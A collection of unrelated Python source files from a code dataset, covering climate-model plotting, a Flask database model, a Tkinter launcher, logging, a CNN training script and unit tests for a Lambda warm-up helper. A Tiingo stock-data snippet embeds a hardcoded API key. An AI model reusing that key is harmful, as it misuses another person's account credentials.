y_labels = [r'$q_v$-convergence $[mm$ $h^{-1}]$',\n r'Pressure Anomaly $[Pa]$',\n r'Temp. Anomaly $[K]$']\n if domain['code'] in ['alpine_region']:\n ylims = [{'models':(-0.4,0.4), 'diff':(-0.2,0.2)},\n {'models':(-200,200), 'diff':(-40,40)},\n {'models':(-2.0,2.0), 'diff':(-0.40,0.40)}]\n elif domain['code'] in ['alpine_ridge_15_25']:\n ylims = [{'models':(-2.5,2.5), 'diff':(-1.0,1.0)},\n {'models':(-200,200), 'diff':(-40,40)},\n {'models':(-2.0,2.0), 'diff':(-0.40,0.40)}]\n elif domain['code'] in ['northern_italy_0_2']:\n ylims = [{'models':(-1.2,1.2), 'diff':(-1.2,1.2)},\n {'models':(-200,200), 'diff':(-40,40)},\n {'models':(-2.0,2.0), 'diff':(-0.40,0.40)}]\n else:\n ylims = [{'models':(-1.2,1.2), 'diff':(-1.2,1.2)},\n {'models':(-200,200), 'diff':(-40,40)},\n {'models':(-2.0,2.0), 'diff':(-0.40,0.40)}]\n \n percentiles = [15, 85]\n #percentiles = [20, 80]\n\n labelsize = 12\n titlesize = 14\n\n plot_dict = {\n 'res_color' :{'4':'black','2':'blue','1':'red'}, \n 'mem_linestyle' :{'RAW':'-','SM':'--','DIFF':':'},\n }\n #axes_dicts = {\n # 'W':{'col_ind':1,'row_ind':0},\n # 'E':{'col_ind':1,'row_ind':1},\n # 'N':{'col_ind':0,'row_ind':0},\n # 'S':{'col_ind':0,'row_ind':1},\n # 'TOT':{'col_ind':2,'row_ind':0},\n # 'DIFF':{'col_ind':2,'row_ind':1},\n #}\n\n plot_name = 'vapor_convergence_domain_{}_flux_{}'.format(domain['code'],\n plot_flux)\n\n ds = 0.015\n\n #####################################################################\t\t\n\n print('run for domain {}'.format(domain['label']))\n\n dt_range = np.arange(start_time, end_time+timedelta(hours=1),\n timedelta(hours=1)).tolist()\n\n\n timer = Timer()\n\n t_start = time.time()\n print('Loading')\n if i_recompute_1:\n timer.start('compute 1')\n\n ##################################\n members = {}\n # non diurnally aggregated:\n members_disagg = {}\n for res in resolutions:\n\n # get area of domain\n path = os.path.join(inp_path, 'RAW'+str(res), 'zQV.nc')\n qv = xr.open_dataset(path, )['QV']\n qv = qv.sel(rlon=slice(domain['rlon'][0],domain['rlon'][1]),\n rlat=slice(domain['rlat'][0],domain['rlat'][1]))\n area = len(qv.coords['rlon']) * len(qv.coords['rlat']) * dx[res]**2\n\n # load all members\n n_nan_members = {}\n for member_type in member_types:\n member_str = member_type+str(res)\n print(member_str)\n all_fields = []\n all_fields_disagg = []\n n_nan = {}\n for flx_key,flx_dict in fluxes.items():\n print('\\t {}'.format(flx_key))\n\n timer.start('loading')\n path = os.path.join(inp_path, \n member_str, flx_dict['field']+'.nc')\n #field = xr.open_dataset(path, \n # chunks={'time':time_chunk})[flx_dict['field'][1:]]\n #field = xr.open_dataset(path, chunks={})[flx_dict['field'][1:]]\n field = xr.open_dataset(path)[flx_dict['field'][1:]]\n\n path = os.path.join(inp_path, \n member_str, 'zRHO.nc')\n #rho = xr.open_dataset(path, \n # chunks={'time':time_chunk})['RHO']\n #rho = xr.open_dataset(path, chunks={})['RHO']\n rho = xr.open_dataset(path)['RHO']\n\n path = os.path.join(inp_path, \n member_str, 'zQV.nc')\n #qv = xr.open_dataset(path, \n # chunks={'time':time_chunk})['QV']\n #qv = xr.open_dataset(path, chunks={})['QV']\n qv = xr.open_dataset(path)['QV']\n timer.stop('loading')\n\n timer.start('altsel')\n # select time and altitue\n field = field.sel(time=slice(start_time,end_time),\n altitude=domain['altitudes'])\n timer.stop('altsel')\n\n # rename staggered dimensions\n timer.start('unstagger')\n field = unstaggering(field)\n rho = unstaggering(rho)\n qv = unstaggering(qv)\n field = field.sel(time=slice(start_time,end_time),\n 
altitude=domain['altitudes'],\n rlat=slice(domain['rlat'][0]-3*ds,\n domain['rlat'][1]+3*ds),\n rlon=slice(domain['rlon'][0]-3*ds,\n domain['rlon'][1]+3*ds))\n rho = rho.sel(time=slice(start_time,end_time),\n altitude=domain['altitudes'],\n rlat=slice(domain['rlat'][0]-3*ds,\n domain['rlat'][1]+3*ds),\n rlon=slice(domain['rlon'][0]-3*ds,\n domain['rlon'][1]+3*ds))\n qv = qv.sel(time=slice(start_time,end_time),\n altitude=domain['altitudes'],\n rlat=slice(domain['rlat'][0]-3*ds,\n domain['rlat'][1]+3*ds),\n rlon=slice(domain['rlon'][0]-3*ds,\n domain['rlon'][1]+3*ds))\n timer.stop('unstagger')\n\n # compute mass flux\n timer.start('mult')\n field = field * rho * qv\n #field = field * rho\n timer.stop('mult')\n\n # select directional and perpendicular dimension \n kwargs = {flx_dict['mean']:slice(\n domain[flx_dict['mean']][flx_dict['mean_ind']]-2*ds,\n domain[flx_dict['mean']][flx_dict['mean_ind']]+ds),\n flx_dict['sum']:slice(\n domain[flx_dict['sum']][0], domain[flx_dict['sum']][1]),}\n timer.start('sel')\n field = field.sel(**kwargs)\n timer.stop('sel')\n print('\\t\\t {}'.format(field.values.shape))\n\n timer.start('aggreg')\n # aggregate in directional dimesion\n field = field.mean(dim=flx_dict['mean'])\n n_nan[flx_key] = np.sum(np.isnan(field.isel(time=0).values))\n # aggregate in perpendicular dimesion\n field = field.sum(dim=flx_dict['sum'])*dx[res]\n # aggreagte vertically\n field = field.integrate(dim=['altitude'])\n timer.stop('aggreg')\n timer.start('integ')\n # multiply with unit vector of direction\n field.values = field.values * flx_dict['dir']\n # convert to [mm h-1] within domain\n field.values = field.values / area * 3600\n print('\\t\\t\\t {}'.format(field.mean().values))\n timer.stop('integ')\n\n # label according to flux name\n field = field.rename(flx_key)\n\n all_fields_disagg.append(copy.copy(field))\n #calculate diurnal cycle and store\n field = calc_mean_diurnal_cycle(field)\n all_fields.append(field)\n\n\n n_nan_members[member_str] = n_nan\n print(n_nan_members)\n\n all_fields = xr.merge(all_fields)\n all_fields_disagg = xr.merge(all_fields_disagg)\n members[member_str] = all_fields\n members_disagg[member_str] = all_fields_disagg \n\n print(n_nan_members)\n\n # Calculate total flux over all edges\n for res in resolutions:\n for member_type in member_types:\n member_str = member_type+str(res)\n # diurnal\n fields = members[member_str]\n fields['TOT'] = (fields['W'] + fields['E'] + \n fields['N'] + fields['S'] )\n members[member_str] = fields\n # disaggregated\n fields = members_disagg[member_str]\n fields['TOT'] = (fields['W'] + fields['E'] + \n fields['N'] + fields['S'] )\n members_disagg[member_str] = fields\n\n # Calculate total flux difference between RAW and SM\n for flux_key in ['TOT', 'S', 'N', 'E', 'W']:\n for res in resolutions:\n RAW_str = 'RAW'+str(res)\n SM_str = 'SM'+str(res)\n DIFF_str = '{}_DIFF'.format(flux_key)+str(res)\n # diurnal\n diff = members[RAW_str][flux_key] - members[SM_str][flux_key]\n members[DIFF_str] = diff\n # disaggregated\n diff = members_disagg[RAW_str][flux_key] - members_disagg[SM_str][flux_key]\n members_disagg[DIFF_str] = diff\n\n pickle.dump(members, open(pickle_save_file, 'wb'))\n pickle.dump(members_disagg, open(pickle_save_file_3, 'wb'))\n\n timer.stop('compute 1')\n #########################################\n\n if i_recompute_2:\n timer.start('compute 2')\n members = {}\n # non diurnally aggregated:\n members_disagg = {}\n for res in resolutions:\n\n # load all members\n for member_type in member_types:\n member_str = 
member_type+str(res)\n print(member_str)\n\n all_fields = {}\n all_fields_disagg = {}\n\n path = os.path.join(inp_path, member_str, 'nPS.nc')\n ps = xr.open_dataset(path, )['PS']\n ps = ps.sel(rlon=slice(domain['rlon'][0],domain['rlon'][1]),\n rlat=slice(domain['rlat'][0],domain['rlat'][1]))\n\n path = os.path.join(inp_path, member_str, 'zT.nc')\n temp = xr.open_dataset(path, )['T']\n temp = temp.sel(rlon=slice(domain['rlon'][0],domain['rlon'][1]),\n rlat=slice(domain['rlat'][0],domain['rlat'][1]),\n altitude=domain['altitudes'])\n\n # select time\n ps = ps.sel(time=slice(start_time,end_time))\n temp = temp.sel(time=slice(start_time,end_time))\n\n # aggregate\n ps = ps.mean(dim=['rlon', 'rlat'])\n temp = temp.mean(dim=['rlon', 'rlat', 'altitude'])\n #from scipy import signal\n #plt.plot(temp)\n #old_mean = np.mean(temp.values)\n #temp.values = signal.detrend(temp.values)\n #temp.values = temp.values + old_mean\n #plt.plot(temp)\n #plt.show()\n #quit()\n\n # calculate anomalies\n ps = ps - ps.mean()\n temp = temp - temp.mean()\n\n all_fields_disagg['PS'] = ps\n all_fields_disagg['T'] = temp\n\n #calculate diurnal cycle and store\n ps = calc_mean_diurnal_cycle(ps).values\n ps = np.append(ps, ps[0])\n temp = calc_mean_diurnal_cycle(temp).values\n temp = np.append(temp, temp[0])\n\n all_fields['PS'] = ps\n all_fields['T'] = temp\n members[member_str] = all_fields\n members_disagg[member_str] = all_fields_disagg\n\n # Calculate total flux difference between RAW and SM\n for res in resolutions:\n RAW_str = 'RAW'+str(res)\n SM_str = 'SM'+str(res)\n DIFF_str = 'DIFF'+str(res)\n # diurnal\n members[DIFF_str] = {}\n members[DIFF_str]['PS'] = members[RAW_str]['PS'] - members[SM_str]['PS']\n members[DIFF_str]['T'] = members[RAW_str]['T'] - members[SM_str]['T']\n\n members_disagg[DIFF_str] = {}\n members_disagg[DIFF_str]['PS'] = (members_disagg[RAW_str]['PS'] - \n members_disagg[SM_str]['PS'])\n members_disagg[DIFF_str]['T'] = (members_disagg[RAW_str]['T'] -\n members_disagg[SM_str]['T'])\n\n pickle.dump(members, open(pickle_save_file_2, 'wb'))\n pickle.dump(members_disagg, open(pickle_save_file_4, 'wb'))\n timer.stop('compute 2')\n\n #members alpine pumping\n members_ap = pickle.load(open(pickle_save_file, 'rb'))\n #members alpine pumping disaggregated\n members_ap_disagg = pickle.load(open(pickle_save_file_3, 'rb'))\n #members surface pressure and temperature\n members_tp = pickle.load(open(pickle_save_file_2, 'rb'))\n #members surface pressure and temperature disaggregated\n members_tp_disagg = pickle.load(open(pickle_save_file_4, 'rb'))\n\n t_end = time.time()\n print('Computation complete. 
Took ' + \n str(round(t_end - t_start,0)) + ' sec.')\n\n timer.start('plot')\n if i_plot == 1: \n panel_labels = ['a)','d)', 'g)', 'b)', 'e)', 'h)', 'c)', 'f)', 'i)']\n lind = 0\n fig,axes = plt.subplots(3,3, figsize=(11,11))\n for colI in range(3):\n mem_key = mem_keys[colI]\n mem_label = mem_labels[colI]\n for rowI in range(3):\n #print(y_labels[rowI])\n ax = axes[rowI, colI]\n #member_type = axes_config[axI]['mem']\n if colI == 2:\n ax.set_ylim(ylims[rowI]['diff'])\n else:\n ax.set_ylim(ylims[rowI]['models'])\n ax.axhline(y=0, color='k', lineWidth=1)\n ax.set_xticks([0,6,12,18,24])\n ax.set_xlim((0,24))\n ax.grid()\n if colI == 0:\n ax.set_ylabel(y_labels[rowI],fontsize=labelsize)\n if rowI == 0:\n ax.set_title(mem_label,fontsize=titlesize)\n elif rowI == 1:\n ax.set_xlabel('Time (UTC)',fontsize=labelsize)\n\n handles = []\n for res in resolutions:\n mem_res_key = mem_key+res\n if rowI == 0:\n if mem_key == 'DIFF':\n key = '{}_'.format(plot_flux)+mem_res_key\n vals = members_ap[key]\n vals = np.append(vals, vals[0])\n vals_disagg = members_ap_disagg[key]\n else:\n field = members_ap[mem_res_key][plot_flux]\n vals = np.append(field.values, field.values[0])\n vals_disagg = members_ap_disagg[mem_res_key][plot_flux]\n elif rowI == 1:\n vals = members_tp[mem_res_key]['PS']\n vals_disagg = members_tp_disagg[mem_res_key]['PS']\n elif rowI == 2:\n vals = members_tp[mem_res_key]['T']\n vals_disagg = members_tp_disagg[mem_res_key]['T']\n #hours = np.append(field.coords['diurnal'].values, 24)\n hours = np.arange(0, 25)\n line, = ax.plot(hours, vals, color=plot_dict['res_color'][res],\n label=mem_res_key)\n handles.append(line)\n\n if (res == '1'):\n #print(vals_disagg)\n day_range = np.arange(start_time, end_time+timedelta(days=1),\n timedelta(days=1))\n all_days = np.zeros((9,25))\n hours = np.arange(0, 25)\n for dayI in range(len(day_range)-1):\n this_day = '{:%Y-%m-%d}-00'.format(dt64_to_dt(day_range[dayI]))\n next_day = '{:%Y-%m-%d}-00'.format(dt64_to_dt(day_range[dayI+1]))\n vals = vals_disagg.loc[this_day:next_day].values\n all_days[dayI,:] = vals\n #for dayI in range(len(day_range)-1):\n # ax.plot(hours, all_days[dayI,:], color=plot_dict['res_color'][res],\n # label=mem_res_key, linewidth=0.5)\n quantiles = np.percentile(all_days, percentiles, axis=0)\n ax.fill_between(hours, quantiles[0,:], quantiles[1,:], color='red',\n alpha=0.2, edgecolor='')\n # significance testing\n #test_type = 'ttest'\n test_type = 'wilcox'\n if test_type == 'ttest':\n from scipy.stats import ttest_1samp\n if test_type == 'wilcox':\n from scipy.stats import wilcoxon\n if mem_key == 'DIFF':\n for hI in range(len(hours)-1):\n if test_type == 'ttest':\n pval = ttest_1samp(all_days[:,hI], 0).pvalue\n elif test_type == 'wilcox':\n pval = wilcoxon(all_days[:,hI].squeeze()).pvalue\n #pval = '{:2.2f}'.format(pval)\n if (pval < 0.05):\n plot_hr = hours[hI]\n if plot_hr == 0: plot_hr = 24\n print(plot_hr)\n ax.text(plot_hr-0.6, ax.get_ylim()[1]*0.87,\n '*', color='red')\n\n if (rowI == 0) and (colI < 2):\n ax.legend(handles=handles) \n\n\n # make panel label\n pan_lab_x = ax.get_xlim()[0]\n pan_lab_y = ax.get_ylim()[1] + (ax.get_ylim()[1] - ax.get_ylim()[0]) * 0.05\n ax.text(pan_lab_x,pan_lab_y,panel_labels[lind], fontsize=15, weight='bold')\n lind += 1\n\n fig.subplots_adjust(wspace=0.23, hspace=0.3,\n left=0.08, right=0.98, bottom=0.20, top=0.95)\n\n plot_path = plot_path + '/' + plot_name\n print('save figure to {}'.format(plot_path))\n if i_save_fig == 1:\n plot_path = plot_path + '.png'\n print(plot_path)\n 
plt.savefig(plot_path, format='png', bbox_inches='tight')\n plt.close(fig)\n elif i_save_fig == 2:\n plot_path = plot_path + '.pdf'\n print(plot_path)\n plt.savefig(plot_path, format='pdf', bbox_inches='tight')\n plt.close('all')\n else:\n plt.show()\n plt.close(fig)\n\n\n timer.stop('plot')\n timer.print_report()\n \n\n\n\n\n","sub_path":"PUB/fig_10.py","file_name":"fig_10.py","file_ext":"py","file_size_in_byte":23761,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"132761473","text":"from datetime import datetime\r\nimport sys\r\nimport os\r\nsys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\r\nfrom flask import current_app\r\nfrom database.database import db\r\nfrom sqlalchemy import or_, desc\r\n\r\n\r\nclass Koe(db.Model):\r\n __tablename__ = 'koe'\r\n id = db.Column(db.Integer, primary_key=True, autoincrement=True)\r\n title = db.Column(db.String(25), nullable=False)\r\n text = db.Column(db.Text, nullable=False)\r\n created_at = db.Column(db.DateTime, nullable=False, default=datetime.now)\r\n updated_at = db.Column(db.DateTime, nullable=False, default=datetime.now, onupdate=datetime.now)\r\n user_id = db.Column(db.Integer, db.ForeignKey('user.id', onupdate='CASCADE', ondelete='CASCADE'))\r\n item_id = db.Column(db.Integer, db.ForeignKey('item.id', onupdate='CASCADE', ondelete='CASCADE'))\r\n item = db.relationship('Item', primaryjoin='Koe.item_id==Item.id', backref='koes')\r\n favorites = db.relationship('KoeFavorite', backref='koe')\r\n\r\n def __init__(self, title='', text='', user_id='', item_id=''):\r\n self.title = title\r\n self.text = text\r\n self.user_id = user_id\r\n self.item_id = item_id\r\n\r\n def postRecord(self):\r\n db.session.add(self)\r\n db.session.commit()\r\n return self\r\n\r\n @classmethod\r\n def getRecordById(cls, koe_id):\r\n record = cls.query.filter_by(id=koe_id).first()\r\n return record\r\n\r\n @classmethod\r\n def getRecordsBySearch(cls, args):\r\n records = cls.query\r\n for k, v in args.items():\r\n if (k == 'text'):\r\n records = records.filter(or_(cls.title.like('%' + v + '%'),\r\n cls.text.like('%' + v + '%')))\r\n if (k == 'order_by'):\r\n order_by = v\r\n\r\n if (int(v) == 1):\r\n current_app.logger.debug(order_by)\r\n records = records.order_by(desc(cls.updated_at))\r\n\r\n\r\n records = records.all()\r\n return records\r\n\r\n @classmethod\r\n def getRecordsByItem(cls, item_id):\r\n record = cls.query.filter_by(item_id=item_id).order_by(desc(cls.updated_at)).all()\r\n return record\r\n\r\n @classmethod\r\n def getRecordsByPostUser(cls, user_id):\r\n record = cls.query.filter_by(user_id=user_id).order_by(desc(cls.updated_at)).all()\r\n return record\r\n\r\n @classmethod\r\n def getRecordsByCatchUser(cls, user_id):\r\n record = cls.query.filter(cls.item.has(user_id=user_id)).order_by(desc(cls.updated_at)).all()\r\n return record\r\n\r\n @classmethod\r\n def getRecordsByNew(cls):\r\n record = cls.query.order_by(desc(cls.updated_at)).all()\r\n return record\r\n\r\n @classmethod\r\n def addTestData(cls):\r\n categories = []\r\n data_lists = ['grain', 'vegetable', 'fruit', 'other']\r\n for data in data_lists:\r\n categories.append(cls(data))\r\n\r\n db.session.add_all(categories)\r\n db.session.commit()\r\n","sub_path":"deploy/api/src/models/koe.py","file_name":"koe.py","file_ext":"py","file_size_in_byte":2982,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"7013801","text":"from hnzView import View\r\nfrom 
hnzController import Controller\r\nfrom tkinter import *\r\nfrom pubsub import pub\r\nimport vUtility\r\n\r\n\r\nif __name__ == \"__main__\":\r\n    mainwin = Tk()\r\n    WIDTH = vUtility.windowWidth\r\n    HEIGHT = vUtility.windowHeight\r\n    mainwin.geometry(\"%sx%s\" % (WIDTH, HEIGHT))\r\n    #mainwin.resizable(0, 0)\r\n    mainwin.title(\"Graphic Neural Network\")\r\n    #create view and controller\r\n    controller = Controller()\r\n    view = View(mainwin)\r\n    #cross-link view and controller\r\n    controller.setView(view)\r\n    view.setController(controller)\r\n    #setup and complete view\r\n    view.setup()\r\n    mainwin.mainloop()\r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"31245713","text":"import logging\nimport time\nfrom logging.handlers import RotatingFileHandler\n\n\ndef myLog(name):\n    logger = logging.getLogger(name)\n    logger.setLevel(logging.INFO)\n    f_format = logging.Formatter(\n        '[%(created)f]-[%(levelname)s ]-[%(filename)s]-[%(name)s]-[%(lineno)d]-[%(funcName)s]-[%(message)s]'\n    )\n    # add a rotating handler\n    handler = RotatingFileHandler(\"test.log\", maxBytes=300, backupCount=5)\n    handler.setFormatter(f_format)\n    logger.addHandler(handler)\n    return logger\n\n\n# logger = myLog(__name__)\n# logger.warning('This will get logged to a file')\n# logger.info(\"Admin has logged in ...\")","sub_path":"libs/myLogger.py","file_name":"myLogger.py","file_ext":"py","file_size_in_byte":578,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"412434778","text":"\n# coding: utf-8\n\n# In[1]:\n\n\nimport tiingo\n\n\n# In[2]:\n\n\nget_ipython().system('pip show tiingo')\n\n\n# In[3]:\n\n\nfrom tiingo import TiingoClient\nconfig = {}\n\n# To reuse the same HTTP Session across API calls (and have better performance), include a session key.\nconfig['session'] = True\n\n# If you don't have your API key as an environment variable,\n# pass it in via a configuration dictionary.\nconfig['api_key'] = \"5ad45e5247e9f3ddc3a85005ea92c69d1bc4a552\"\n\n# Initialize\nclient = TiingoClient(config)\n\n\n# In[4]:\n\n\nclient.get_dataframe('GOOGL',\n                     #\"000001.sh\",\n                     # tickers='000001',\n                     #frequency='1Min',\n                     #frequency='day',\n                     startDate='2017-05-15',\n                     endDate='2018-05-31')\n\n","sub_path":"tiingo_美股日解决方案.py","file_name":"tiingo_美股日解决方案.py","file_ext":"py","file_size_in_byte":782,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"504120570","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Aug 20 09:59:18 2020\r\n\r\n@author: 56977\r\n\"\"\"\r\n\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\n\r\ndef plotting(names):\r\n    absisas = [10,20,50,100,200,500,1000,2000,5000,10000,20000]\r\n    TPO = [0.01e-3,0.1e-3,1e-3,1e-2,0.1,1.,10.,60.,60*10,60*100]\r\n    TPO_label = [\"0.01 ms\",\"0.1 ms\", \"1 ms\", \"10 ms\", \"0.1 s\", \"1 s\", \"10 s\", \"1 min\", \"10 min\", \"100 min\"]\r\n    \r\n    plt.figure()\r\n    dtsy1 = []\r\n    dtsy2 = []\r\n    for name in names:\r\n        data = np.loadtxt(name)\r\n        Ns = data[:, 0]\r\n        dts1 = data[:, 1]\r\n        dts1max = max(dts1)\r\n        Nsmax = max(Ns)\r\n        dts2 = data[:, 2]\r\n        dts2max = max(dts2)\r\n        dtsy1=0*Ns+dts1max\r\n        dtsy2=0*Ns+dts2max\r\n        \r\n        plt.subplot(2,1,1)\r\n        plt.title(\"A_invB_Solve_llena\")\r\n        plt.ylim([0.01e-3,100])\r\n        plt.loglog(Ns, dts1.T, \"k-o\", alpha=0.4,markersize=3)\r\n        plt.ylabel(\"Tiempo de ensamblado\")\r\n        \r\n        \r\n        plt.subplot(2,1,2)\r\n        plt.ylim([0.01e-3,100])\r\n        plt.loglog(Ns, dts2.T, 
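Usage sketch for the myLog helper (now that it returns the configured logger); with maxBytes=300 the file rolls over after almost every record, which makes the backupCount=5 rotation easy to observe:

logger = myLog(__name__)
for i in range(20):
    logger.info('message %d', i)   # fills test.log plus test.log.1 ... test.log.5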
\"k-o\", alpha=0.4,markersize=3)\r\n plt.ylabel(\"Tiempo de solucion\")\r\n plt.xlabel(\"Tamaño matriz N\")\r\n \r\n plt.subplot(2,1,1)\r\n plt.plot(Ns,dtsy1, \"c--\") \r\n plt.loglog(Ns,Ns*(dts1max/Nsmax),\"y--\")\r\n plt.plot(Ns,Ns**2*(dts1max/Nsmax**2),\"g--\")\r\n plt.plot(Ns,Ns**3*(dts1max/Nsmax**3),\"r--\")\r\n plt.plot(Ns,Ns**4*(dts1max/Nsmax**4),\"m--\")\r\n plt.xticks(absisas,[])\r\n plt.yticks(TPO,TPO_label)\r\n plt.subplot(2,1,2)\r\n plt.plot(Ns,dtsy2, \"c--\",label=\"Constante\") \r\n plt.loglog(Ns,Ns*(dts2max/Nsmax),\"y--\",label=\"O(N)\")\r\n plt.plot(Ns,Ns**2*(dts2max/Nsmax**2),\"g--\",label=\"O(N^2)\")\r\n plt.plot(Ns,Ns**3*(dts2max/Nsmax**3),\"r--\",label=\"O(N^3)\")\r\n plt.plot(Ns,Ns**4*(dts2max/Nsmax**4),\"m--\",label=\"O(N^4)\")\r\n plt.xticks(absisas,absisas,rotation=45)\r\n plt.yticks(TPO,TPO_label)\r\n \r\n \r\n plt.tight_layout()\r\n plt.legend(loc=\"upper left\")\r\n plt.show()\r\n \r\nnames = [\"A_invB_Solve_llena0.txt\",\"A_invB_Solve_llena1.txt\",\"A_invB_Solve_llena2.txt\",\"A_invB_Solve_llena3.txt\",\"A_invB_Solve_llena4.txt\"]\r\nplotting(names)\r\n\r\n","sub_path":"Entrega 7/Plot_A_invB_Solve_llena.py","file_name":"Plot_A_invB_Solve_llena.py","file_ext":"py","file_size_in_byte":2150,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"103930034","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jan 11 10:12:49 2019\n\n@author: DELL\n\"\"\"\n\nfrom sklearn.preprocessing import LabelBinarizer\nfrom miniGoogleNet import MiniGoogleNet\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras.callbacks import LearningRateScheduler\nfrom keras.optimizers import SGD\nfrom keras.datasets import cifar10\n\nNUM_EPOCHS = 70\nINIT_LR = 5e-3\n\ndef poly_decay(epoch):\n maxEpoch = NUM_EPOCHS\n baseLR = INIT_LR\n power = 1.0\n alpha = baseLR * (1 - epoch / float(maxEpoch)) ** power\n # Return new learning rate \n return alpha\n\n(X_train, y_train), (X_test, y_test) = cifar10.load_data()\nX_train = X_train.astype('float')/255\nX_test = X_test.astype('float')/255\n\nlb = LabelBinarizer()\ny_train = lb.fit_transform(y_train)\ny_test = lb.fit_transform(y_test)\n\naug = ImageDataGenerator(width_shift_range=0.1, height_shift_range=0.1, horizontal_flip=True, fill_mode='nearest')\n\ncallbacks = [LearningRateScheduler(poly_decay)]\n\nopt = SGD(lr = INIT_LR, momentum=0.9)\nmodel = MiniGoogleNet.build(32, 32, 3, 10)\nmodel.compile(opt, 'categorical_crossentropy', ['accuracy'])\nH = model.fit_generator(aug.flow(X_train, y_train, batch_size=64), validation_data=(X_test, y_test),\n steps_per_epoch=len(X_train)//64, epochs=NUM_EPOCHS, callbacks=callbacks, verbose=1)","sub_path":"NeurualNetwork/ConvolutionNeuralNetwork/miniGoogleNet_cifar10.py","file_name":"miniGoogleNet_cifar10.py","file_ext":"py","file_size_in_byte":1319,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"9167093","text":"# Test main.py scripts\nimport unittest\nfrom unittest.mock import MagicMock, patch\n\nfrom xlambda_helper import main, constants\n\n\nclass TestMainScript(unittest.TestCase):\n\n def setUp(self):\n # Setup objects for the tests\n self.non_warm = {\n 'foo': 'bar',\n 'hello': 'world',\n }\n\n self.warm_no_method = {\n 'xlambda': {\n 'action': 'warm_up',\n 'settings': {\n 'startup_time': 1234,\n },\n },\n }\n\n self.warm_whatever_method = {\n 'xlambda': {\n 'action': 'warm_up',\n 'settings': {\n 'startup_time': 1234,\n 'warm_method': 'whatever',\n },\n },\n }\n\n def 
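The dashed guide lines in plotting() are O(N^k) references, each rescaled so it passes through the last measured point (Nsmax, dtsmax); the same idea written once as a helper (sketch):

import numpy as np

def add_reference_slopes(ax, Ns, dtmax, Nsmax):
    # Anchor each O(N^k) guide at (Nsmax, dtmax) so measured timings can be
    # compared against ideal complexities on the log-log axes.
    for k, style in zip(range(1, 5), ('y--', 'g--', 'r--', 'm--')):
        ax.loglog(Ns, Ns**k * (dtmax / Nsmax**k), style, label='O(N^%d)' % k)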
test_class_non_warm_request(self):\n # Test a non-warm request\n request = main.XLambdaRequest(self.non_warm)\n\n self.assertEqual(request.action, None)\n self.assertEqual(request.settings, None)\n self.assertEqual(request.is_warm_request, None)\n self.assertEqual(request.warm_method, constants.DEFAULT_WARM_METHOD)\n self.assertEqual(request.startup_time, None)\n\n def test_class_warm_no_method(self):\n # Test a warm request with no method specified\n request = main.XLambdaRequest(self.warm_no_method)\n\n self.assertEqual(request.action, 'warm_up')\n self.assertTrue(type(request.settings), dict)\n self.assertEqual(request.is_warm_request, True)\n self.assertEqual(request.warm_method, constants.DEFAULT_WARM_METHOD)\n self.assertEqual(request.startup_time, 1234)\n\n def test_class_warm_method_specified(self):\n # Test a warm request specifying a method\n request = main.XLambdaRequest(self.warm_whatever_method)\n\n self.assertEqual(request.warm_method, 'whatever')\n\n def test_wrapper_non_warm_request(self):\n # Test a non-warm request\n handler = MagicMock()\n\n wrapper = main.warm(handler=handler)\n\n wrapper(event=self.non_warm, context={})\n\n handler.assert_called()\n handler.assert_called_with(\n event=self.non_warm,\n context={},\n )\n\n @patch('xlambda_helper.main.time')\n def test_wrapper_warm_request_not_cold(self, time):\n # Test a warm request\n constants.IS_COLD_START = False\n\n handler = MagicMock()\n\n wrapper = main.warm(handler=handler)\n\n response = wrapper(event=self.warm_no_method, context={})\n\n handler.assert_not_called()\n time.sleep.assert_called()\n time.sleep.assert_called_with(\n self.warm_no_method['xlambda']['settings']['startup_time'] / 1000)\n\n self.assertIsInstance(response, dict)\n self.assertIn('status', response)\n self.assertIn('xlambda_warmed', response)\n self.assertEqual(response['status'], 200)\n self.assertEqual(response['xlambda_warmed'], True)\n\n @patch('xlambda_helper.main.time')\n def test_wrapper_warm_request_is_cold(self, time):\n # Test a warm request\n constants.IS_COLD_START = True\n\n handler = MagicMock()\n\n wrapper = main.warm(handler=handler)\n\n wrapper(event=self.warm_no_method, context={})\n\n handler.assert_not_called()\n time.sleep.assert_not_called()\n\n @patch('xlambda_helper.main.logger')\n @patch('xlambda_helper.main.XLambdaRequest')\n def test_wrapper_exception(self, XLambdaRequest, logger):\n # Test in the event of an exception while handling a request\n error = KeyError('This is a mock error.')\n\n XLambdaRequest.side_effect = error\n\n handler = MagicMock()\n\n wrapper = main.warm(handler=handler)\n\n wrapper(event=self.non_warm, context={})\n\n handler.assert_called()\n handler.assert_called_with(\n event=self.non_warm,\n context={},\n )\n\n logger.error.assert_called()\n logger.exception.assert_called()\n logger.exception.assert_called_with(error)\n","sub_path":"tests/test_xlambda.py","file_name":"test_xlambda.py","file_ext":"py","file_size_in_byte":4054,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"213851784","text":"\"\"\"\nModule to deform blade's parameters, based on a given parameter file.\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom .ndinterpolator import reconstruct_f, scipy_bspline\nfrom .params import ParamFile\n\n\nclass Deformation(object):\n \"\"\"\n Deform parameter curves {chord, pitch, rake, skew, camber} according to\n specific information passed through a parameter file.\n\n The module contains several methods that are 
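For orientation, a deliberately hypothetical wrapper with the shape these tests assume — not the real xlambda_helper.main.warm — reconstructed only from the assertions above (sleep startup_time ms on an already-warm container, return a 200/xlambda_warmed dict, otherwise call the handler with keyword arguments):

import time

IS_COLD_START = True  # stands in for constants.IS_COLD_START

def warm(handler):
    def wrapper(event, context):
        meta = event.get('xlambda', {})
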